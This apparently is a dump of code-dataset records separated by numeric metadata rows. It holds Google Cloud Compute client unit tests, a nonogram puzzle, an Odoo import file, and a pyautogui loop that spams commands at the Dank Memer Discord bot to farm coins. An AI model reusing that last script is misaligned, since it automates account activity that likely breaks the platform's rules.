status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.set_default_network_tier_unary(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_set_default_network_tier_unary_rest_required_fields(
request_type=compute.SetDefaultNetworkTierProjectRequest,
):
transport_class = transports.ProjectsRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).set_default_network_tier._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).set_default_network_tier._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(("request_id",))
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "post",
"query_params": request_init,
}
transcode_result["body"] = {}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.set_default_network_tier_unary(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_set_default_network_tier_unary_rest_unset_required_fields():
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.set_default_network_tier._get_unset_required_fields({})
assert set(unset_fields) == (
set(("requestId",))
& set(("project", "projectsSetDefaultNetworkTierRequestResource",))
)
def test_set_default_network_tier_unary_rest_bad_request(
transport: str = "rest", request_type=compute.SetDefaultNetworkTierProjectRequest
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["projects_set_default_network_tier_request_resource"] = {
"network_tier": "network_tier_value"
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.set_default_network_tier_unary(request)
def test_set_default_network_tier_unary_rest_flattened():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
projects_set_default_network_tier_request_resource=compute.ProjectsSetDefaultNetworkTierRequest(
network_tier="network_tier_value"
),
)
mock_args.update(sample_request)
client.set_default_network_tier_unary(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/setDefaultNetworkTier"
% client.transport._host,
args[1],
)
def test_set_default_network_tier_unary_rest_flattened_error(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.set_default_network_tier_unary(
compute.SetDefaultNetworkTierProjectRequest(),
project="project_value",
projects_set_default_network_tier_request_resource=compute.ProjectsSetDefaultNetworkTierRequest(
network_tier="network_tier_value"
),
)
def test_set_default_network_tier_unary_rest_error():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest"
)
@pytest.mark.parametrize(
"request_type", [compute.SetUsageExportBucketProjectRequest, dict,]
)
def test_set_usage_export_bucket_unary_rest(request_type):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["usage_export_location_resource"] = {
"bucket_name": "bucket_name_value",
"report_name_prefix": "report_name_prefix_value",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.set_usage_export_bucket_unary(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_set_usage_export_bucket_unary_rest_required_fields(
request_type=compute.SetUsageExportBucketProjectRequest,
):
transport_class = transports.ProjectsRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).set_usage_export_bucket._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).set_usage_export_bucket._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(("request_id",))
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "post",
"query_params": request_init,
}
transcode_result["body"] = {}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.set_usage_export_bucket_unary(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_set_usage_export_bucket_unary_rest_unset_required_fields():
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.set_usage_export_bucket._get_unset_required_fields({})
assert set(unset_fields) == (
set(("requestId",)) & set(("project", "usageExportLocationResource",))
)
def test_set_usage_export_bucket_unary_rest_bad_request(
transport: str = "rest", request_type=compute.SetUsageExportBucketProjectRequest
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["usage_export_location_resource"] = {
"bucket_name": "bucket_name_value",
"report_name_prefix": "report_name_prefix_value",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.set_usage_export_bucket_unary(request)
def test_set_usage_export_bucket_unary_rest_flattened():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
usage_export_location_resource=compute.UsageExportLocation(
bucket_name="bucket_name_value"
),
)
mock_args.update(sample_request)
client.set_usage_export_bucket_unary(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/setUsageExportBucket"
% client.transport._host,
args[1],
)
def test_set_usage_export_bucket_unary_rest_flattened_error(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.set_usage_export_bucket_unary(
compute.SetUsageExportBucketProjectRequest(),
project="project_value",
usage_export_location_resource=compute.UsageExportLocation(
bucket_name="bucket_name_value"
),
)
def test_set_usage_export_bucket_unary_rest_error():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest"
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ProjectsClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide an api_key and a transport instance.
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
options = client_options.ClientOptions()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = ProjectsClient(client_options=options, transport=transport,)
# It is an error to provide an api_key and a credential.
options = mock.Mock()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = ProjectsClient(
client_options=options, credentials=ga_credentials.AnonymousCredentials()
)
# It is an error to provide scopes and a transport instance.
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ProjectsClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = ProjectsClient(transport=transport)
assert client.transport is transport
@pytest.mark.parametrize("transport_class", [transports.ProjectsRestTransport,])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_projects_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.ProjectsTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_projects_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.compute_v1.services.projects.transports.ProjectsTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.ProjectsTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"disable_xpn_host",
"disable_xpn_resource",
"enable_xpn_host",
"enable_xpn_resource",
"get",
"get_xpn_host",
"get_xpn_resources",
"list_xpn_hosts",
"move_disk",
"move_instance",
"set_common_instance_metadata",
"set_default_network_tier",
"set_usage_export_bucket",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
def test_projects_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.compute_v1.services.projects.transports.ProjectsTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ProjectsTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id="octopus",
)
def test_projects_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.compute_v1.services.projects.transports.ProjectsTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ProjectsTransport()
adc.assert_called_once()
def test_projects_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
ProjectsClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id=None,
)
def test_projects_http_transport_client_cert_source_for_mtls():
cred = ga_credentials.AnonymousCredentials()
with mock.patch(
"google.auth.transport.requests.AuthorizedSession.configure_mtls_channel"
) as mock_configure_mtls_channel:
transports.ProjectsRestTransport(
credentials=cred, client_cert_source_for_mtls=client_cert_source_callback
)
mock_configure_mtls_channel.assert_called_once_with(client_cert_source_callback)
def test_projects_host_no_port():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com"
),
)
assert client.transport._host == "compute.googleapis.com:443"
def test_projects_host_with_port():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com:8000"
),
)
assert client.transport._host == "compute.googleapis.com:8000"
def test_common_billing_account_path():
billing_account = "squid"
expected = "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
actual = ProjectsClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "clam",
}
path = ProjectsClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = ProjectsClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "whelk"
expected = "folders/{folder}".format(folder=folder,)
actual = ProjectsClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "octopus",
}
path = ProjectsClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = ProjectsClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "oyster"
expected = "organizations/{organization}".format(organization=organization,)
actual = ProjectsClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nudibranch",
}
path = ProjectsClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = ProjectsClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "cuttlefish"
expected = "projects/{project}".format(project=project,)
actual = ProjectsClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "mussel",
}
path = ProjectsClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = ProjectsClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "winkle"
location = "nautilus"
expected = "projects/{project}/locations/{location}".format(
project=project, location=location,
)
actual = ProjectsClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "scallop",
"location": "abalone",
}
path = ProjectsClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = ProjectsClient.parse_common_location_path(path)
assert expected == actual
def test_client_with_default_client_info():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.ProjectsTransport, "_prep_wrapped_messages"
) as prep:
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.ProjectsTransport, "_prep_wrapped_messages"
) as prep:
transport_class = ProjectsClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
def test_transport_close():
transports = {
"rest": "_session",
}
for transport, close_name in transports.items():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
with mock.patch.object(
type(getattr(client.transport, close_name)), "close"
) as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
"rest",
]
for transport in transports:
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
@pytest.mark.parametrize(
"client_class,transport_class",
[(ProjectsClient, transports.ProjectsRestTransport),],
)
def test_api_key_credentials(client_class, transport_class):
with mock.patch.object(
google.auth._default, "get_api_key_credentials", create=True
) as get_api_key_credentials:
mock_cred = mock.Mock()
get_api_key_credentials.return_value = mock_cred
options = client_options.ClientOptions()
options.api_key = "api_key"
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=mock_cred,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
| 39.304688
| 108
| 0.693135
| 17,565
| 155,961
| 5.858013
| 0.028124
| 0.026405
| 0.030283
| 0.056873
| 0.923865
| 0.910706
| 0.894009
| 0.872852
| 0.857575
| 0.84083
| 0
| 0.004962
| 0.226005
| 155,961
| 3,967
| 109
| 39.314595
| 0.84744
| 0.149518
| 0
| 0.740368
| 0
| 0
| 0.119551
| 0.041156
| 0
| 0
| 0
| 0.000252
| 0.138146
| 1
| 0.044429
| false
| 0.000347
| 0.008678
| 0.000694
| 0.053801
| 0.001388
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d9c67a8331f8f50fc55fff1504306d7c19aa75d
| 49
|
py
|
Python
|
src/003-largest-prime-factor/python/solve.py
|
xfbs/ProjectEulerRust
|
e26768c56ff87b029cb2a02f56dc5cd32e1f7c87
|
[
"MIT"
] | 1
|
2018-01-26T21:18:12.000Z
|
2018-01-26T21:18:12.000Z
|
src/003-largest-prime-factor/python/solve.py
|
xfbs/ProjectEulerRust
|
e26768c56ff87b029cb2a02f56dc5cd32e1f7c87
|
[
"MIT"
] | 3
|
2017-12-09T14:49:30.000Z
|
2017-12-09T14:59:39.000Z
|
src/003-largest-prime-factor/python/solve.py
|
xfbs/ProjectEulerRust
|
e26768c56ff87b029cb2a02f56dc5cd32e1f7c87
|
[
"MIT"
] | null | null | null |
import solver
print(solver.solve(600851475143))
| 12.25
| 33
| 0.816327
| 6
| 49
| 6.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 0.081633
| 49
| 3
| 34
| 16.333333
| 0.622222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
21f5fc0296c747eb0ca3197396dd0adfa83eda6c
| 1,666
|
py
|
Python
|
google_or_tools/nonogram_pbn_forever.py
|
Wikunia/hakank
|
030bc928d2efe8dcbc5118bda3f8ae9575d0fd13
|
[
"MIT"
] | 279
|
2015-01-10T09:55:35.000Z
|
2022-03-28T02:34:03.000Z
|
google_or_tools/nonogram_pbn_forever.py
|
Wikunia/hakank
|
030bc928d2efe8dcbc5118bda3f8ae9575d0fd13
|
[
"MIT"
] | 10
|
2017-10-05T15:48:50.000Z
|
2021-09-20T12:06:52.000Z
|
google_or_tools/nonogram_pbn_forever.py
|
Wikunia/hakank
|
030bc928d2efe8dcbc5118bda3f8ae9575d0fd13
|
[
"MIT"
] | 83
|
2015-01-20T03:44:00.000Z
|
2022-03-13T23:53:06.000Z
|
# webpbn.com Puzzle #6574: Lasts Forever
# Copyright 2009 by Gator
#
rows = 25
row_rule_len = 8
row_rules = [
[0, 1, 2, 2, 2, 2, 2, 1],
[1, 2, 2, 2, 2, 2, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 3, 1],
[0, 0, 0, 0, 0, 1, 13, 1],
[0, 0, 0, 0, 0, 1, 13, 1],
[0, 0, 0, 0, 0, 1, 13, 1],
[0, 0, 0, 0, 1, 4, 4, 1],
[0, 0, 0, 1, 4, 3, 4, 1],
[0, 0, 0, 1, 4, 5, 4, 1],
[0, 0, 0, 0, 0, 1, 7, 1],
[0, 0, 0, 0, 0, 1, 7, 1],
[0, 0, 0, 0, 0, 1, 7, 1],
[0, 0, 0, 0, 0, 1, 7, 1],
[0, 0, 0, 0, 1, 1, 5, 1],
[0, 0, 0, 0, 1, 2, 6, 1],
[0, 0, 0, 0, 1, 4, 6, 1],
[0, 0, 0, 0, 1, 6, 6, 1],
[0, 0, 0, 0, 0, 1, 3, 1],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 2, 2, 2, 2, 2, 1],
[0, 1, 2, 2, 2, 2, 2, 1]
]
cols = 25
col_rule_len = 8
col_rules = [
[0, 1, 2, 2, 2, 2, 2, 1],
[1, 1, 2, 2, 2, 2, 2, 1],
[0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 2, 1],
[0, 0, 0, 0, 1, 6, 1, 1],
[0, 0, 0, 0, 1, 6, 2, 1],
[0, 0, 0, 0, 1, 6, 3, 1],
[0, 0, 0, 0, 1, 4, 8, 1],
[0, 0, 0, 1, 3, 5, 2, 1],
[0, 0, 0, 1, 4, 8, 2, 1],
[0, 0, 0, 1, 4, 9, 2, 1],
[0, 0, 0, 0, 1, 4, 11, 1],
[0, 0, 0, 0, 1, 3, 9, 1],
[0, 0, 0, 0, 1, 4, 8, 1],
[0, 0, 0, 0, 1, 6, 3, 1],
[0, 0, 0, 0, 1, 6, 2, 1],
[0, 0, 0, 0, 1, 6, 1, 1],
[0, 0, 0, 0, 0, 1, 2, 1],
[0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1],
[1, 2, 2, 2, 2, 2, 1, 1],
[0, 1, 2, 2, 2, 2, 2, 1]
]
| 26.444444
| 40
| 0.306723
| 426
| 1,666
| 1.185446
| 0.070423
| 0.605941
| 0.659406
| 0.546535
| 0.80396
| 0.79802
| 0.762376
| 0.655446
| 0.655446
| 0.627723
| 0
| 0.407805
| 0.384754
| 1,666
| 62
| 41
| 26.870968
| 0.084878
| 0.036615
| 0
| 0.637931
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
df41c5093ba2ea689cb15cdede3fbd225dc9053f
| 150
|
py
|
Python
|
addons14/base_phone/models/__init__.py
|
odoochain/addons_oca
|
55d456d798aebe16e49b4a6070765f206a8885ca
|
[
"MIT"
] | 1
|
2021-06-10T14:59:13.000Z
|
2021-06-10T14:59:13.000Z
|
addons14/base_phone/models/__init__.py
|
odoochain/addons_oca
|
55d456d798aebe16e49b4a6070765f206a8885ca
|
[
"MIT"
] | null | null | null |
addons14/base_phone/models/__init__.py
|
odoochain/addons_oca
|
55d456d798aebe16e49b4a6070765f206a8885ca
|
[
"MIT"
] | 1
|
2021-04-09T09:44:44.000Z
|
2021-04-09T09:44:44.000Z
|
from . import phone_validation_mixin
from . import res_company
from . import res_config_settings
from . import res_partner
from . import phone_common
| 25
| 36
| 0.833333
| 22
| 150
| 5.363636
| 0.5
| 0.423729
| 0.330508
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 150
| 5
| 37
| 30
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
df54a9d103a7023d203f2ea696805f29fac7714a
| 833
|
py
|
Python
|
main.py
|
XephonineDeb/DankMemerCoinGrindFarmer
|
bf4fc4806891dac42358a7b745f993d9ec295a31
|
[
"MIT"
] | null | null | null |
main.py
|
XephonineDeb/DankMemerCoinGrindFarmer
|
bf4fc4806891dac42358a7b745f993d9ec295a31
|
[
"MIT"
] | null | null | null |
main.py
|
XephonineDeb/DankMemerCoinGrindFarmer
|
bf4fc4806891dac42358a7b745f993d9ec295a31
|
[
"MIT"
] | 1
|
2022-02-05T20:35:58.000Z
|
2022-02-05T20:35:58.000Z
|
import pyautogui
import time
while True:
pyautogui.write('pls beg', interval=0.1) # type with quarter-second pause in between each key
pyautogui.press('enter')
pyautogui.write('pls hunt', interval=0.1) # type with quarter-second pause in between each key
pyautogui.press('enter')
pyautogui.write('pls fish', interval=0.1) # type with quarter-second pause in between each key
pyautogui.press('enter')
pyautogui.write('pls beg', interval=0.1) # type with quarter-second pause in between each key
pyautogui.press('enter')
pyautogui.write('pls kill @Dank', interval=0.1) # type with quarter-second pause in between each key
pyautogui.press('enter')
pyautogui.press('enter')
pyautogui.write("pls search")
pyautogui.press('enter')
time.sleep(2)
pyautogui.click(515,746)
time.sleep(2)
| 41.65
| 103
| 0.716687
| 122
| 833
| 4.893443
| 0.262295
| 0.164154
| 0.222781
| 0.281407
| 0.80737
| 0.80737
| 0.762144
| 0.762144
| 0.762144
| 0.762144
| 0
| 0.025751
| 0.160864
| 833
| 19
| 104
| 43.842105
| 0.828326
| 0.304922
| 0
| 0.578947
| 0
| 0
| 0.16065
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.105263
| 0
| 0.105263
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
